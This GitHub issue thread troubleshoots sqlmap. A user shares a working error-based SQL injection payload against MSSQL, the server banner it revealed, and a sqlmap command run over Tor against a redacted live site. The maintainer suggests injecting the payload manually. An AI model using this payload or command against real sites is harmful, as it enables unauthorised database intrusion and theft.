### ISSUE TITLE
parsed DBMS error message: 'Incorrect syntax near the keyword 'FROM''

### ISSUE THREAD

**Issue by acassio22** [sqlmapproject/sqlmap#2304]
Hi

I'm trying to list the tables in an MSSQL database and always give a syntax error, it follows the information:

Parsed Errors:
`[WARNING] parsed DBMS error message: 'Incorrect syntax near the keyword 'FROM''`

Payload:
`[PAYLOAD] -7719 OR 8397 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT ISNULL(CAST(COUNT(DATABASENAME..sysusers.name+CHAR(46)+DATABASENAME..sysobjects.name) AS NVARCHAR(4000)),CHAR(32)) FROM DATABASENAME..sysobjects INNER JOIN DATABASENAME..sysusers ON DATABASENAME..sysobjects.uid = DATABASENAME..sysusers.uid WHERE DATABASENAME..sysobjects.xtype IN (CHAR(117),CHAR(118)))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(112)+CHAR(113)))
`

Banner:

```
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS operating system: Windows 2008 R2 or 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
```

String:
`
./sqlmap.py -u http://www.xxxxxxxxxxxx.com/detalhes.asp?cod= --random-agent --tor -D DATABASENAME --tables --banner --parse-errors -v 6 --fresh-queries`

Is it some sort of protection or is SQLMap generating the wrong syntax?

**Comment by stamparm** [comment]
There is nothing "invalid" around `FROM`: ` FROM DATABASENAME..sysobjects `. Please do the research by injecting that payload manually (e.g. via browser).
